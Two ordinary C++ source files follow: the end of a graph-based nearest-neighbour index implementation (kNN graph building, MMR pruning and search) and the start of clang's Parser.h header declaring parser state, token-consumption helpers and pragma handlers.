template <typename PointType, typename DistanceFuncType, typename DistanceType>
void GraphIndex<PointType, DistanceFuncType, DistanceType>::BuildKnnGraphIndex(
int refine_iter_num) {
InitPointNeighborInfo();
for (size_t loop = 0; loop < refine_iter_num; loop++) {
util::Log("iteration " + std::to_string(loop));
UpdatePointNeighborInfo();
LocalJoin();
}
}
template <typename PointType, typename DistanceFuncType, typename DistanceType>
void GraphIndex<PointType, DistanceFuncType, DistanceType>::ExtractIndex() {
all_point_index_.resize(PointSize());
#pragma omp parallel for schedule(static)
for (IntIndex point_id = 0; point_id < PointSize(); point_id++) {
PointNeighbor& neighbor = all_point_info_[point_id].knn;
IdList& knn_list = all_point_index_[point_id];
knn_list.resize(neighbor.size());
for (size_t i = 0; i < neighbor.size(); i++) {
knn_list[i] = neighbor[i].id;
}
}
// clear old knn graph
all_point_info_.clear();
}
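// MMRRanking below re-orders a candidate list by maximal marginal relevance
// (intent inferred from the naming and the code): each step selects the
// candidate j maximizing
//     lambda * proximity[j] - (1 - lambda) * 0.5 * max_cosine[j]
// trading closeness to the query vertex against angular diversity with the
// neighbors already selected.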
template <typename PointType, typename DistanceFuncType, typename DistanceType>
void GraphIndex<PointType, DistanceFuncType, DistanceType>::MMRRanking(
const PointType& vertex_vec, PointNeighbor& knn,
size_t knn_candidate_size, double lambda) {
knn_candidate_size = std::min(knn_candidate_size, knn.size());
std::vector<double> max_cosine(knn_candidate_size, 0.0);
std::vector<double> proximity(knn_candidate_size, 0.0);
DistanceType max_dist = knn[0].distance;
DistanceType min_dist = knn[0].distance;
for (size_t i = 1; i < knn_candidate_size; i++) {
max_dist = std::max(knn[i].distance, max_dist);
min_dist = std::min(knn[i].distance, min_dist);
}
for (size_t i = 0; i < knn_candidate_size; i++) {
double dist = static_cast<double>(knn[i].distance);
proximity[i] = - dist / (max_dist - min_dist + constant::epsilon);
}
// select the i-th neighbor; stop at the candidate list size to avoid
// indexing past the end when k_ exceeds knn_candidate_size
for (size_t i = 1; i < std::min(static_cast<size_t>(k_), knn_candidate_size); i++) {
// update diversity score
PointType added_dir = GetPoint(knn[i-1].id) - vertex_vec;
PointType added_dir_norm = added_dir.normalized();
for (size_t j = i; j < knn_candidate_size; j++) {
PointType cur_dir = GetPoint(knn[j].id) - vertex_vec;
PointType cur_dir_norm = cur_dir.normalized();
max_cosine[j] = std::max(max_cosine[j], static_cast<double>(cur_dir_norm.dot(added_dir_norm)));
}
// select max mmr
double max_mmr = 0.0;
int max_mmr_id = -1;
for (size_t j = i; j < knn_candidate_size; j++) {
double mmr = lambda * proximity[j] + (1.0 - lambda) * 0.5 * (-max_cosine[j]);
if (max_mmr_id == -1 || max_mmr < mmr) {
max_mmr_id = j;
max_mmr = mmr;
}
}
std::swap(knn[max_mmr_id], knn[i]);
std::swap(max_cosine[max_mmr_id], max_cosine[i]);
std::swap(proximity[max_mmr_id], proximity[i]);
}
}
template <typename PointType, typename DistanceFuncType, typename DistanceType>
void GraphIndex<PointType, DistanceFuncType, DistanceType>::Prune() {
#pragma omp parallel for schedule(static)
for (IntIndex point_id = 0; point_id < PointSize(); point_id++) {
PointNeighbor& knn = all_point_info_[point_id].knn;
MMRRanking(GetPoint(point_id), knn, join_k_, lambda_);
knn.remax_size(k_);
}
}
template <typename PointType, typename DistanceFuncType, typename DistanceType>
void GraphIndex<PointType, DistanceFuncType, DistanceType>::Reverse() {
// reverse
#pragma omp parallel for schedule(static)
for (IntIndex point_id = 0; point_id < PointSize(); point_id++) {
PointNeighbor& point_neighbor = all_point_info_[point_id].knn;
for (size_t i = 0; i < k_; i++) {
IntIndex neighbor_id = point_neighbor[i].id;
PointNeighbor& neighbor = all_point_info_[neighbor_id].knn;
PointDistancePairItem reverse_neighbor(point_id, point_neighbor[i].distance, true);
neighbor.parallel_push(reverse_neighbor);
}
}
#pragma omp parallel for schedule(static)
for (IntIndex point_id = 0; point_id < PointSize(); point_id++) {
PointNeighbor& point_neighbor = all_point_info_[point_id].knn;
point_neighbor.unique(k_);
}
}
template <typename PointType, typename DistanceFuncType, typename DistanceType>
void GraphIndex<PointType, DistanceFuncType, DistanceType>::InitPointNeighborInfo() {
size_t max_point_id = PointSize();
util::IntRandomGenerator int_rand(0, max_point_id-1);
#pragma omp parallel for schedule(static)
for (IntIndex point_id = 0; point_id < max_point_id; point_id++) {
PointInfo& point_info = all_point_info_[point_id];
size_t random_neighbor_size = std::min(static_cast<size_t>(k_), max_point_id-1);
IdSet neighbor_set;
while (neighbor_set.size() < random_neighbor_size) {
IntIndex neighbor_id = int_rand.Random();
if (neighbor_id == point_id || neighbor_set.find(neighbor_id) != neighbor_set.end()) {
continue;
}
neighbor_set.insert(neighbor_id);
DistanceType dist = distance_func_(GetPoint(neighbor_id), GetPoint(point_id));
point_info.knn.insert(PointDistancePairItem(neighbor_id, dist, true));
}
point_info.effect_size = std::min(static_cast<size_t>(k_), point_info.knn.size());
if (point_info.effect_size > 0) {
point_info.radius = point_info.knn[point_info.effect_size-1].distance;
}
else {
point_info.radius = 0;
}
}
}
template <typename PointType, typename DistanceFuncType, typename DistanceType>
void GraphIndex<PointType, DistanceFuncType, DistanceType>::UpdatePointNeighborInfo() {
#pragma omp parallel for schedule(static)
for (IntIndex point_id = 0; point_id < PointSize(); point_id++) {
PointInfo& point_info = all_point_info_[point_id];
auto& knn = point_info.knn;
size_t max_effect_size = std::min(knn.size(), static_cast<size_t>(join_k_));
IntIndex effect_size = max_effect_size;
int new_point_count = 0;
for (IntIndex i = 0; i < max_effect_size; i++) {
if (knn[i].flag) {
new_point_count++;
if (new_point_count >= k_) {
effect_size = i+1;
break;
}
}
}
point_info.reset(effect_size);
}
#pragma omp parallel for schedule(static)
for (IntIndex point_id = 0; point_id < PointSize(); point_id++) {
PointInfo& point_info = all_point_info_[point_id];
auto& knn = point_info.knn;
IntIndex effect_size = knn.effect_size(point_info.effect_size);
for (IntIndex i = 0; i < effect_size; i++) {
auto& neighbor = knn[i];
PointInfo& neighbor_info = all_point_info_[neighbor.id];
// neighbor
point_info.insert(neighbor.id, neighbor.flag);
// reverse neighbor, avoid repeat element
if (neighbor.distance > neighbor_info.radius) {
neighbor_info.parallel_insert_reverse(point_id, neighbor.flag);
}
neighbor.flag = false;
}
}
}
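// LocalJoin below follows the NN-Descent local-join pattern (intent inferred
// from the new/old bookkeeping): each point's sampled "new" neighbors are
// compared against both "new" and "old" neighbors, and an update is counted
// whenever an insertion lands inside some point's current top-k.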
template <typename PointType, typename DistanceFuncType, typename DistanceType>
int GraphIndex<PointType, DistanceFuncType, DistanceType>::LocalJoin() {
size_t sample_num = 100; // cap on sampled reverse neighbors
int update_count = 0;
#pragma omp parallel for schedule(dynamic, 5) default(shared) reduction(+:update_count)
for (IntIndex point_id = 0; point_id < PointSize(); point_id++) {
PointInfo& point_info = all_point_info_[point_id];
IdList& new_list = point_info.new_list;
IdList& reverse_new_list = point_info.reverse_new_list;
if (new_list.size() == 0 && reverse_new_list.size() == 0) {
continue;
}
if (reverse_new_list.size() > sample_num) {
std::random_shuffle(reverse_new_list.begin(), reverse_new_list.end());
reverse_new_list.resize(sample_num);
}
new_list.insert(new_list.end(), reverse_new_list.begin(), reverse_new_list.end());
IdList& old_list = point_info.old_list;
IdList& reverse_old_list = point_info.reverse_old_list;
if (reverse_old_list.size() > sample_num) {
std::random_shuffle(reverse_old_list.begin(), reverse_old_list.end());
reverse_old_list.resize(sample_num);
}
old_list.insert(old_list.end(), reverse_old_list.begin(), reverse_old_list.end());
// update new
int cur_update_count = 0;
for (size_t i = 0; i < new_list.size(); i++) {
IntIndex p1 = new_list[i];
for (size_t j = i+1; j < new_list.size(); j++) {
IntIndex p2 = new_list[j];
cur_update_count += UpdatePointKnn(p1, p2);
}
for (size_t j = 0; j < old_list.size(); j++) {
IntIndex p2 = old_list[j];
cur_update_count += UpdatePointKnn(p1, p2);
}
}
update_count += cur_update_count;
}
return update_count;
}
template <typename PointType, typename DistanceFuncType, typename DistanceType>
int GraphIndex<PointType, DistanceFuncType, DistanceType>::UpdatePointKnn(
IntIndex point1, IntIndex point2) {
if (point1 == point2) {
return 0;
}
DistanceType dist = distance_func_(GetPoint(point1), GetPoint(point2));
int update_count = 0;
int update_pos = all_point_info_[point1].knn.parallel_insert(PointDistancePairItem(point2, dist, true));
update_count += update_pos < k_ ? 1 : 0;
update_pos = all_point_info_[point2].knn.parallel_insert(PointDistancePairItem(point1, dist, true));
update_count += update_pos < k_ ? 1 : 0;
return update_count;
}
template <typename PointType, typename DistanceFuncType, typename DistanceType>
void GraphIndex<PointType, DistanceFuncType, DistanceType>::SearchKnn(
const PointType& query, int search_K, PointNeighbor& knn_results) {
if (!this->have_built_) {
throw IndexBuildError("Graph index hasn't been built!");
}
DynamicBitset visited_point_flag(PointSize(), 0);
util::IntRandomGenerator int_rand(0, PointSize()-1);
size_t random_start = int_rand.Random();
for (size_t random_index = random_start;
random_index < random_start + search_K; random_index++) {
IntIndex start_point_id = shuffle_point_id_list_[random_index % PointSize()];
visited_point_flag[start_point_id] = 1;
DistanceType dist = distance_func_(GetPoint(start_point_id), query);
knn_results.insert(PointDistancePairItem(start_point_id, dist, true));
}
size_t start_index = 0;
while (start_index < search_K) {
auto& current_point = knn_results[start_index];
if (current_point.flag == false) {
start_index++;
continue;
}
current_point.flag = false;
const IdList& knn_list = all_point_index_[current_point.id];
for (size_t i = 0; i < knn_list.size(); i++) {
IntIndex neighbor_id = knn_list[i];
if (visited_point_flag[neighbor_id]) {
continue;
}
visited_point_flag[neighbor_id] = 1;
DistanceType neighbor_dist = distance_func_(GetPoint(neighbor_id), query);
size_t update_pos = knn_results.insert(PointDistancePairItem(neighbor_id, neighbor_dist, true));
if (update_pos <= start_index) {
start_index = update_pos;
}
}
}
}
template <typename PointType, typename DistanceFuncType, typename DistanceType>
void GraphIndex<PointType, DistanceFuncType, DistanceType>::SearchKnn(
const PointType& query, const util::GraphSearchParameter& search_param,
std::vector<std::string>& search_result) {
PointNeighbor knn_results(std::max(search_param.search_K, search_param.K));
SearchKnn(query, search_param.search_K, knn_results);
search_result.clear();
for (size_t i = 0; i < knn_results.effect_size(search_param.K); i++) {
search_result.push_back(this->dataset_ptr_->GetKeyById(knn_results[i].id));
}
}
} // namespace core
} // namespace yannsa
#endif
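/*
  A minimal usage sketch (assumed types and parameter fields, based only on
  the declarations above; MyPoint and MyDistance stand in for the
  caller-supplied PointType and DistanceFuncType):

    yannsa::core::GraphIndex<MyPoint, MyDistance> index(dataset_ptr);
    yannsa::util::GraphIndexParameter param;
    param.k = 10;
    param.join_k = 30;
    param.lambda = 0.5;
    param.refine_iter_num = 8;
    index.Build(param);
    index.SaveIndex("graph.knn");
*/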
|
Parser.h | //===--- Parser.h - C Language Parser ---------------------------*- C++ -*-===//
//
// The LLVM Compiler Infrastructure
//
// This file is distributed under the University of Illinois Open Source
// License. See LICENSE.TXT for details.
//
//===----------------------------------------------------------------------===//
//
// This file defines the Parser interface.
//
//===----------------------------------------------------------------------===//
#ifndef LLVM_CLANG_PARSE_PARSER_H
#define LLVM_CLANG_PARSE_PARSER_H
#include "clang/AST/Availability.h"
#include "clang/Basic/OpenMPKinds.h"
#include "clang/Basic/OperatorPrecedence.h"
#include "clang/Basic/Specifiers.h"
#include "clang/Lex/CodeCompletionHandler.h"
#include "clang/Lex/Preprocessor.h"
#include "clang/Sema/DeclSpec.h"
#include "clang/Sema/LoopHint.h"
#include "clang/Sema/Sema.h"
#include "llvm/ADT/SmallVector.h"
#include "llvm/Support/Compiler.h"
#include "llvm/Support/PrettyStackTrace.h"
#include "llvm/Support/SaveAndRestore.h"
#include <memory>
#include <stack>
namespace clang {
class PragmaHandler;
class Scope;
class BalancedDelimiterTracker;
class CorrectionCandidateCallback;
class DeclGroupRef;
class DiagnosticBuilder;
class Parser;
class ParsingDeclRAIIObject;
class ParsingDeclSpec;
class ParsingDeclarator;
class ParsingFieldDeclarator;
class ColonProtectionRAIIObject;
class InMessageExpressionRAIIObject;
class PoisonSEHIdentifiersRAIIObject;
class VersionTuple;
class OMPClause;
class ObjCTypeParamList;
class ObjCTypeParameter;
/// Parser - This implements a parser for the C family of languages. After
/// parsing units of the grammar, productions are invoked to handle whatever has
/// been read.
///
class Parser : public CodeCompletionHandler {
friend class ColonProtectionRAIIObject;
friend class InMessageExpressionRAIIObject;
friend class PoisonSEHIdentifiersRAIIObject;
friend class ObjCDeclContextSwitch;
friend class ParenBraceBracketBalancer;
friend class BalancedDelimiterTracker;
Preprocessor &PP;
/// Tok - The current token we are peeking ahead. All parsing methods assume
/// that this is valid.
Token Tok;
// PrevTokLocation - The location of the token we previously
// consumed. This token is used for diagnostics where we expected to
// see a token following another token (e.g., the ';' at the end of
// a statement).
SourceLocation PrevTokLocation;
unsigned short ParenCount = 0, BracketCount = 0, BraceCount = 0;
unsigned short MisplacedModuleBeginCount = 0;
/// Actions - These are the callbacks we invoke as we parse various constructs
/// in the file.
Sema &Actions;
DiagnosticsEngine &Diags;
/// ScopeCache - Cache scopes to reduce malloc traffic.
enum { ScopeCacheSize = 16 };
unsigned NumCachedScopes;
Scope *ScopeCache[ScopeCacheSize];
/// Identifiers used for SEH handling in Borland. These are only
/// allowed in particular circumstances.
// __except block
IdentifierInfo *Ident__exception_code,
*Ident___exception_code,
*Ident_GetExceptionCode;
// __except filter expression
IdentifierInfo *Ident__exception_info,
*Ident___exception_info,
*Ident_GetExceptionInfo;
// __finally
IdentifierInfo *Ident__abnormal_termination,
*Ident___abnormal_termination,
*Ident_AbnormalTermination;
/// Contextual keywords for Microsoft extensions.
IdentifierInfo *Ident__except;
mutable IdentifierInfo *Ident_sealed;
/// Ident_super - IdentifierInfo for "super", to support fast
/// comparison.
IdentifierInfo *Ident_super;
/// Ident_vector, Ident_bool - cached IdentifierInfos for "vector" and
/// "bool" fast comparison. Only present if AltiVec or ZVector are enabled.
IdentifierInfo *Ident_vector;
IdentifierInfo *Ident_bool;
/// Ident_pixel - cached IdentifierInfos for "pixel" fast comparison.
/// Only present if AltiVec enabled.
IdentifierInfo *Ident_pixel;
/// Objective-C contextual keywords.
mutable IdentifierInfo *Ident_instancetype;
/// \brief Identifier for "introduced".
IdentifierInfo *Ident_introduced;
/// \brief Identifier for "deprecated".
IdentifierInfo *Ident_deprecated;
/// \brief Identifier for "obsoleted".
IdentifierInfo *Ident_obsoleted;
/// \brief Identifier for "unavailable".
IdentifierInfo *Ident_unavailable;
/// \brief Identifier for "message".
IdentifierInfo *Ident_message;
/// \brief Identifier for "strict".
IdentifierInfo *Ident_strict;
/// \brief Identifier for "replacement".
IdentifierInfo *Ident_replacement;
/// C++0x contextual keywords.
mutable IdentifierInfo *Ident_final;
mutable IdentifierInfo *Ident_GNU_final;
mutable IdentifierInfo *Ident_override;
// C++ type trait keywords that can be reverted to identifiers and still be
// used as type traits.
llvm::SmallDenseMap<IdentifierInfo *, tok::TokenKind> RevertibleTypeTraits;
std::unique_ptr<PragmaHandler> AlignHandler;
std::unique_ptr<PragmaHandler> GCCVisibilityHandler;
std::unique_ptr<PragmaHandler> OptionsHandler;
std::unique_ptr<PragmaHandler> PackHandler;
std::unique_ptr<PragmaHandler> MSStructHandler;
std::unique_ptr<PragmaHandler> UnusedHandler;
std::unique_ptr<PragmaHandler> WeakHandler;
std::unique_ptr<PragmaHandler> RedefineExtnameHandler;
std::unique_ptr<PragmaHandler> FPContractHandler;
std::unique_ptr<PragmaHandler> OpenCLExtensionHandler;
std::unique_ptr<PragmaHandler> OpenMPHandler;
std::unique_ptr<PragmaHandler> MSCommentHandler;
std::unique_ptr<PragmaHandler> MSDetectMismatchHandler;
std::unique_ptr<PragmaHandler> MSPointersToMembers;
std::unique_ptr<PragmaHandler> MSVtorDisp;
std::unique_ptr<PragmaHandler> MSInitSeg;
std::unique_ptr<PragmaHandler> MSDataSeg;
std::unique_ptr<PragmaHandler> MSBSSSeg;
std::unique_ptr<PragmaHandler> MSConstSeg;
std::unique_ptr<PragmaHandler> MSCodeSeg;
std::unique_ptr<PragmaHandler> MSSection;
std::unique_ptr<PragmaHandler> MSRuntimeChecks;
std::unique_ptr<PragmaHandler> MSIntrinsic;
std::unique_ptr<PragmaHandler> CUDAForceHostDeviceHandler;
std::unique_ptr<PragmaHandler> OptimizeHandler;
std::unique_ptr<PragmaHandler> LoopHintHandler;
std::unique_ptr<PragmaHandler> UnrollHintHandler;
std::unique_ptr<PragmaHandler> NoUnrollHintHandler;
std::unique_ptr<CommentHandler> CommentSemaHandler;
/// Whether the '>' token acts as an operator or not. This will be
/// true except when we are parsing an expression within a C++
/// template argument list, where the '>' closes the template
/// argument list.
bool GreaterThanIsOperator;
/// ColonIsSacred - When this is false, we aggressively try to recover from
/// code like "foo : bar" as if it were a typo for "foo :: bar". This is not
/// safe in case statements and a few other things. This is managed by the
/// ColonProtectionRAIIObject RAII object.
bool ColonIsSacred;
/// \brief When true, we are directly inside an Objective-C message
/// send expression.
///
/// This is managed by the \c InMessageExpressionRAIIObject class, and
/// should not be set directly.
bool InMessageExpression;
/// The "depth" of the template parameters currently being parsed.
unsigned TemplateParameterDepth;
/// \brief RAII class that manages the template parameter depth.
class TemplateParameterDepthRAII {
unsigned &Depth;
unsigned AddedLevels;
public:
explicit TemplateParameterDepthRAII(unsigned &Depth)
: Depth(Depth), AddedLevels(0) {}
~TemplateParameterDepthRAII() {
Depth -= AddedLevels;
}
void operator++() {
++Depth;
++AddedLevels;
}
void addDepth(unsigned D) {
Depth += D;
AddedLevels += D;
}
unsigned getDepth() const { return Depth; }
};
/// Factory object for creating AttributeList objects.
AttributeFactory AttrFactory;
/// \brief Gathers and cleans up TemplateIdAnnotations when parsing of a
/// top-level declaration is finished.
SmallVector<TemplateIdAnnotation *, 16> TemplateIds;
/// \brief Identifiers which have been declared within a tentative parse.
SmallVector<IdentifierInfo *, 8> TentativelyDeclaredIdentifiers;
IdentifierInfo *getSEHExceptKeyword();
/// True if we are within an Objective-C container while parsing C-like decls.
///
/// This is necessary because Sema thinks we have left the container
/// to parse the C-like decls, meaning Actions.getObjCDeclContext() will
/// be NULL.
bool ParsingInObjCContainer;
bool SkipFunctionBodies;
/// The location of the expression statement that is being parsed right now.
/// Used to determine if an expression that is being parsed is a statement or
/// just a regular sub-expression.
SourceLocation ExprStatementTokLoc;
public:
Parser(Preprocessor &PP, Sema &Actions, bool SkipFunctionBodies);
~Parser() override;
const LangOptions &getLangOpts() const { return PP.getLangOpts(); }
const TargetInfo &getTargetInfo() const { return PP.getTargetInfo(); }
Preprocessor &getPreprocessor() const { return PP; }
Sema &getActions() const { return Actions; }
AttributeFactory &getAttrFactory() { return AttrFactory; }
const Token &getCurToken() const { return Tok; }
Scope *getCurScope() const { return Actions.getCurScope(); }
void incrementMSManglingNumber() const {
return Actions.incrementMSManglingNumber();
}
Decl *getObjCDeclContext() const { return Actions.getObjCDeclContext(); }
// Type forwarding. All of these are statically 'void*', but they may all be
// different actual classes based on the actions in place.
typedef OpaquePtr<DeclGroupRef> DeclGroupPtrTy;
typedef OpaquePtr<TemplateName> TemplateTy;
typedef SmallVector<TemplateParameterList *, 4> TemplateParameterLists;
typedef Sema::FullExprArg FullExprArg;
// Parsing methods.
/// Initialize - Warm up the parser.
///
void Initialize();
/// Parse the first top-level declaration in a translation unit.
bool ParseFirstTopLevelDecl(DeclGroupPtrTy &Result);
/// ParseTopLevelDecl - Parse one top-level declaration. Returns true if
/// the EOF was encountered.
bool ParseTopLevelDecl(DeclGroupPtrTy &Result);
bool ParseTopLevelDecl() {
DeclGroupPtrTy Result;
return ParseTopLevelDecl(Result);
}
/// ConsumeToken - Consume the current 'peek token' and lex the next one.
/// This does not work with special tokens: string literals, code completion
/// and balanced tokens must be handled using the specific consume methods.
/// Returns the location of the consumed token.
SourceLocation ConsumeToken() {
assert(!isTokenSpecial() &&
"Should consume special tokens with Consume*Token");
PrevTokLocation = Tok.getLocation();
PP.Lex(Tok);
return PrevTokLocation;
}
bool TryConsumeToken(tok::TokenKind Expected) {
if (Tok.isNot(Expected))
return false;
assert(!isTokenSpecial() &&
"Should consume special tokens with Consume*Token");
PrevTokLocation = Tok.getLocation();
PP.Lex(Tok);
return true;
}
bool TryConsumeToken(tok::TokenKind Expected, SourceLocation &Loc) {
if (!TryConsumeToken(Expected))
return false;
Loc = PrevTokLocation;
return true;
}
SourceLocation getEndOfPreviousToken() {
return PP.getLocForEndOfToken(PrevTokLocation);
}
/// Retrieve the underscored keyword (_Nonnull, _Nullable) that corresponds
/// to the given nullability kind.
IdentifierInfo *getNullabilityKeyword(NullabilityKind nullability) {
return Actions.getNullabilityKeyword(nullability);
}
private:
//===--------------------------------------------------------------------===//
// Low-Level token peeking and consumption methods.
//
/// isTokenParen - Return true if the cur token is '(' or ')'.
bool isTokenParen() const {
return Tok.getKind() == tok::l_paren || Tok.getKind() == tok::r_paren;
}
/// isTokenBracket - Return true if the cur token is '[' or ']'.
bool isTokenBracket() const {
return Tok.getKind() == tok::l_square || Tok.getKind() == tok::r_square;
}
/// isTokenBrace - Return true if the cur token is '{' or '}'.
bool isTokenBrace() const {
return Tok.getKind() == tok::l_brace || Tok.getKind() == tok::r_brace;
}
/// isTokenStringLiteral - True if this token is a string-literal.
bool isTokenStringLiteral() const {
return tok::isStringLiteral(Tok.getKind());
}
/// isTokenSpecial - True if this token requires special consumption methods.
bool isTokenSpecial() const {
return isTokenStringLiteral() || isTokenParen() || isTokenBracket() ||
isTokenBrace() || Tok.is(tok::code_completion);
}
/// \brief Returns true if the current token is '=' or is a type of '='.
/// For typos, give a fixit to '='
bool isTokenEqualOrEqualTypo();
/// \brief Return the current token to the token stream and make the given
/// token the current token.
void UnconsumeToken(Token &Consumed) {
Token Next = Tok;
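// Hand Consumed back to the preprocessor and re-lex it so it becomes the
// current token again; then queue the saved token so it is returned by the
// next lex.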
PP.EnterToken(Consumed);
PP.Lex(Tok);
PP.EnterToken(Next);
}
/// ConsumeAnyToken - Dispatch to the right Consume* method based on the
/// current token type. This should only be used in cases where the type of
/// the token really isn't known, e.g. in error recovery.
SourceLocation ConsumeAnyToken(bool ConsumeCodeCompletionTok = false) {
if (isTokenParen())
return ConsumeParen();
if (isTokenBracket())
return ConsumeBracket();
if (isTokenBrace())
return ConsumeBrace();
if (isTokenStringLiteral())
return ConsumeStringToken();
if (Tok.is(tok::code_completion))
return ConsumeCodeCompletionTok ? ConsumeCodeCompletionToken()
: handleUnexpectedCodeCompletionToken();
return ConsumeToken();
}
/// ConsumeParen - This consume method keeps the paren count up-to-date.
///
SourceLocation ConsumeParen() {
assert(isTokenParen() && "wrong consume method");
if (Tok.getKind() == tok::l_paren)
++ParenCount;
else if (ParenCount)
--ParenCount; // Don't let unbalanced )'s drive the count negative.
PrevTokLocation = Tok.getLocation();
PP.Lex(Tok);
return PrevTokLocation;
}
/// ConsumeBracket - This consume method keeps the bracket count up-to-date.
///
SourceLocation ConsumeBracket() {
assert(isTokenBracket() && "wrong consume method");
if (Tok.getKind() == tok::l_square)
++BracketCount;
else if (BracketCount)
--BracketCount; // Don't let unbalanced ]'s drive the count negative.
PrevTokLocation = Tok.getLocation();
PP.Lex(Tok);
return PrevTokLocation;
}
/// ConsumeBrace - This consume method keeps the brace count up-to-date.
///
SourceLocation ConsumeBrace() {
assert(isTokenBrace() && "wrong consume method");
if (Tok.getKind() == tok::l_brace)
++BraceCount;
else if (BraceCount)
--BraceCount; // Don't let unbalanced }'s drive the count negative.
PrevTokLocation = Tok.getLocation();
PP.Lex(Tok);
return PrevTokLocation;
}
/// ConsumeStringToken - Consume the current 'peek token', lexing a new one
/// and returning the token kind. This method is specific to strings, as it
/// handles string literal concatenation, as per C99 5.1.1.2, translation
/// phase #6.
SourceLocation ConsumeStringToken() {
assert(isTokenStringLiteral() &&
"Should only consume string literals with this method");
PrevTokLocation = Tok.getLocation();
PP.Lex(Tok);
return PrevTokLocation;
}
/// \brief Consume the current code-completion token.
///
/// This routine can be called to consume the code-completion token and
/// continue processing in special cases where \c cutOffParsing() isn't
/// desired, such as token caching or completion with lookahead.
SourceLocation ConsumeCodeCompletionToken() {
assert(Tok.is(tok::code_completion));
PrevTokLocation = Tok.getLocation();
PP.Lex(Tok);
return PrevTokLocation;
}
/// \brief When we are consuming a code-completion token without having
/// matched specific position in the grammar, provide code-completion results
/// based on context.
///
/// \returns the source location of the code-completion token.
SourceLocation handleUnexpectedCodeCompletionToken();
/// \brief Abruptly cut off parsing; mainly used when we have reached the
/// code-completion point.
void cutOffParsing() {
if (PP.isCodeCompletionEnabled())
PP.setCodeCompletionReached();
// Cut off parsing by acting as if we reached the end-of-file.
Tok.setKind(tok::eof);
}
/// \brief Determine if we're at the end of the file or at a transition
/// between modules.
bool isEofOrEom() {
tok::TokenKind Kind = Tok.getKind();
return Kind == tok::eof || Kind == tok::annot_module_begin ||
Kind == tok::annot_module_end || Kind == tok::annot_module_include;
}
/// \brief Initialize all pragma handlers.
void initializePragmaHandlers();
/// \brief Destroy and reset all pragma handlers.
void resetPragmaHandlers();
/// \brief Handle the annotation token produced for #pragma unused(...)
void HandlePragmaUnused();
/// \brief Handle the annotation token produced for
/// #pragma GCC visibility...
void HandlePragmaVisibility();
/// \brief Handle the annotation token produced for
/// #pragma pack...
void HandlePragmaPack();
/// \brief Handle the annotation token produced for
/// #pragma ms_struct...
void HandlePragmaMSStruct();
/// \brief Handle the annotation token produced for
/// #pragma comment...
void HandlePragmaMSComment();
void HandlePragmaMSPointersToMembers();
void HandlePragmaMSVtorDisp();
void HandlePragmaMSPragma();
bool HandlePragmaMSSection(StringRef PragmaName,
SourceLocation PragmaLocation);
bool HandlePragmaMSSegment(StringRef PragmaName,
SourceLocation PragmaLocation);
bool HandlePragmaMSInitSeg(StringRef PragmaName,
SourceLocation PragmaLocation);
/// \brief Handle the annotation token produced for
/// #pragma align...
void HandlePragmaAlign();
/// \brief Handle the annotation token produced for
/// #pragma clang __debug dump...
void HandlePragmaDump();
/// \brief Handle the annotation token produced for
/// #pragma weak id...
void HandlePragmaWeak();
/// \brief Handle the annotation token produced for
/// #pragma weak id = id...
void HandlePragmaWeakAlias();
/// \brief Handle the annotation token produced for
/// #pragma redefine_extname...
void HandlePragmaRedefineExtname();
/// \brief Handle the annotation token produced for
/// #pragma STDC FP_CONTRACT...
void HandlePragmaFPContract();
/// \brief Handle the annotation token produced for
/// #pragma OPENCL EXTENSION...
void HandlePragmaOpenCLExtension();
/// \brief Handle the annotation token produced for
/// #pragma clang __debug captured
StmtResult HandlePragmaCaptured();
/// \brief Handle the annotation token produced for
/// #pragma clang loop and #pragma unroll.
bool HandlePragmaLoopHint(LoopHint &Hint);
/// GetLookAheadToken - This peeks ahead N tokens and returns that token
/// without consuming any tokens. LookAhead(0) returns 'Tok', LookAhead(1)
/// returns the token after Tok, etc.
///
/// Note that this differs from the Preprocessor's LookAhead method, because
/// the Parser always has one token lexed that the preprocessor doesn't.
///
const Token &GetLookAheadToken(unsigned N) {
if (N == 0 || Tok.is(tok::eof)) return Tok;
return PP.LookAhead(N-1);
}
public:
/// NextToken - This peeks ahead one token and returns it without
/// consuming it.
const Token &NextToken() {
return PP.LookAhead(0);
}
/// getTypeAnnotation - Read a parsed type out of an annotation token.
static ParsedType getTypeAnnotation(Token &Tok) {
return ParsedType::getFromOpaquePtr(Tok.getAnnotationValue());
}
private:
static void setTypeAnnotation(Token &Tok, ParsedType T) {
Tok.setAnnotationValue(T.getAsOpaquePtr());
}
/// \brief Read an already-translated primary expression out of an annotation
/// token.
static ExprResult getExprAnnotation(Token &Tok) {
return ExprResult::getFromOpaquePointer(Tok.getAnnotationValue());
}
/// \brief Set the primary expression corresponding to the given annotation
/// token.
static void setExprAnnotation(Token &Tok, ExprResult ER) {
Tok.setAnnotationValue(ER.getAsOpaquePointer());
}
public:
// If NeedType is true, then TryAnnotateTypeOrScopeToken will try harder to
// find a type name by attempting typo correction.
bool TryAnnotateTypeOrScopeToken(bool EnteringContext = false,
bool NeedType = false);
bool TryAnnotateTypeOrScopeTokenAfterScopeSpec(bool EnteringContext,
bool NeedType,
CXXScopeSpec &SS,
bool IsNewScope);
bool TryAnnotateCXXScopeToken(bool EnteringContext = false);
private:
enum AnnotatedNameKind {
/// Annotation has failed and emitted an error.
ANK_Error,
/// The identifier is a tentatively-declared name.
ANK_TentativeDecl,
/// The identifier is a template name. FIXME: Add an annotation for that.
ANK_TemplateName,
/// The identifier can't be resolved.
ANK_Unresolved,
/// Annotation was successful.
ANK_Success
};
AnnotatedNameKind
TryAnnotateName(bool IsAddressOfOperand,
std::unique_ptr<CorrectionCandidateCallback> CCC = nullptr);
/// Push a tok::annot_cxxscope token onto the token stream.
void AnnotateScopeToken(CXXScopeSpec &SS, bool IsNewAnnotation);
/// TryAltiVecToken - Check for context-sensitive AltiVec identifier tokens,
/// replacing them with the non-context-sensitive keywords. This returns
/// true if the token was replaced.
bool TryAltiVecToken(DeclSpec &DS, SourceLocation Loc,
const char *&PrevSpec, unsigned &DiagID,
bool &isInvalid) {
if (!getLangOpts().AltiVec && !getLangOpts().ZVector)
return false;
if (Tok.getIdentifierInfo() != Ident_vector &&
Tok.getIdentifierInfo() != Ident_bool &&
(!getLangOpts().AltiVec || Tok.getIdentifierInfo() != Ident_pixel))
return false;
return TryAltiVecTokenOutOfLine(DS, Loc, PrevSpec, DiagID, isInvalid);
}
/// TryAltiVecVectorToken - Check for context-sensitive AltiVec vector
/// identifier token, replacing it with the non-context-sensitive __vector.
/// This returns true if the token was replaced.
bool TryAltiVecVectorToken() {
if ((!getLangOpts().AltiVec && !getLangOpts().ZVector) ||
Tok.getIdentifierInfo() != Ident_vector) return false;
return TryAltiVecVectorTokenOutOfLine();
}
